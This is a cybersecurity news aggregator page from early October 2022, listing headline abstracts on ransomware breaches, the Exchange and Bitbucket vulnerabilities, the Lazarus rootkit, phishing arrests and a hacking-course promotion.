Another US defense contractor suffered a data breach, the BlackCat ransomware gang claims to have hacked NJVC. The ALPHV/BlackCat ransomware gang claims to have breached the IT firm NJVC, which supports the federal government and the United States Department...Security Affairs
October 02, 2022 – Government
Russians dodging mobilization behind flourishing scam market Full Text
Abstract
Ever since Russian president Vladimir Putin ordered partial mobilization after facing setbacks on the Ukrainian front, men in Russia and the state's conscript officers are playing a 'cat and mouse' game involving technology and cybercrime services.BleepingComputer
October 2, 2022 – General
Security Affairs newsletter Round 386 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. CISA...Security Affairs
October 2, 2022 – Criminals
German police identified a gang that stole €4 million via phishing attacks Full Text
Abstract
German police arrested one individual suspected of having stolen €4 million from users via large-scale phishing campaigns. Germany's Bundeskriminalamt (BKA) arrested an individual (24) suspected of having stolen €4,000,000 from internet users...Security Affairs
October 01, 2022 – Education
Pay What You Want for This Collection of White Hat Hacking Courses Full Text
Abstract
Whether you relish a mental challenge or fancy a six-figure paycheck, there are many good reasons to get into white hat hacking . That said, picking up the necessary knowledge to build a new career can seem like a daunting task. There is a lot to learn, after all. To help you get started, The Hacker News Deals is currently running an eye-catching offer: pay what you want for one video course, and get another eight courses if you beat the average price paid. Special Offer — For a limited time, name your price for one cybersecurity course and beat the average price paid to get lifetime access to nine courses . The full bundle is worth $1,668! With thousands of unfilled positions, white hat hacking is a lucrative and exciting career path. This bundle provides a solid introduction to the world of penetration testing and general cybersecurity, with over 65 hours of intensive training. Through concise video tutorials, you learn how to secure your own machine with Kali Linux andThe Hacker News
October 1, 2022 – Vulnerabilities
SolarMarker Attack Leverages Weak WordPress Sites, Fake Chrome Browser Updates Full Text
Abstract
Researchers have discovered the group behind the SolarMarker malware targeting a global tax consulting organization with a presence in the US, Canada, the UK, and Europe, which is using fake Chrome browser updates as part of watering hole attacks.Dark Reading
October 01, 2022 – Hacker
State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations Full Text
Abstract
Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at less than 10 organizations globally. "These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration," the Microsoft Threat Intelligence Center (MSTIC) said in a new analysis. The weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the "highly privileged access Exchange systems confer onto an attacker." The tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative dThe Hacker News
October 01, 2022 – Solution
Microsoft to let Office 365 users report Teams phishing messages Full Text
Abstract
Microsoft is working on updating Microsoft Defender for Office 365 to allow Microsoft Teams users to alert their organization's security team of any dodgy messages they receive.BleepingComputer
October 1, 2022 – Criminals
Cybercriminals See Allure in BEC Attacks Over Ransomware Full Text
Abstract
While published trends in ransomware attacks have been contradictory — with some firms tracking more incidents and other fewer — business email compromise (BEC) attacks continue to have proven success against organizations.Dark Reading
October 01, 2022 – Government
CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed critical flaw impacting Atlassian's Bitbucket Server and Data Center to the Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. Tracked as CVE-2022-36804 , the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary code execution on susceptible installations by sending a specially crafted HTTP request. Successful exploitation, however, banks on the prerequisite that the attacker already has access to a public repository or possesses read permissions to a private Bitbucket repository. "All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability," Atlassian noted in a late August 2022 advisory. CISA didThe Hacker News
October 01, 2022 – Vulnerabilities
Lazarus hackers abuse Dell driver bug using new FudModule rootkit Full Text
Abstract
The notorious North Korean hacking group 'Lazarus' was seen installing a Windows rootkit that abuses a Dell hardware driver in a Bring Your Own Vulnerable Driver attack.BleepingComputer
October 1, 2022 – Government
CISA adds Atlassian Bitbucket Server flaw to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
CISA added a recently disclosed flaw in Atlassian Bitbucket Server, tracked as CVE-2022-36804, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a recently disclosed...Security Affairs
October 1, 2022 – Breach
Guacamaya hacktivists stole sensitive data from Mexico and Latin American countries Full Text
Abstract
A hacker group called Guacamaya stole classified government information from multiple military and government agencies across several Latin American countries. Among the data stolen by a group of hackers called Guacamaya (macaw in Spanish) there was a huge...Security Affairs
October 1, 2022 – Breach
Luxury hotel chain Shangri-La suffered a security breach Full Text
Abstract
The Shangri-La hotel group disclosed a data breach, a database containing the personal information of its customers was compromised. The Shangri-La hotel group disclosed a data breach, threat actors had access to a database containing the personal...Security Affairs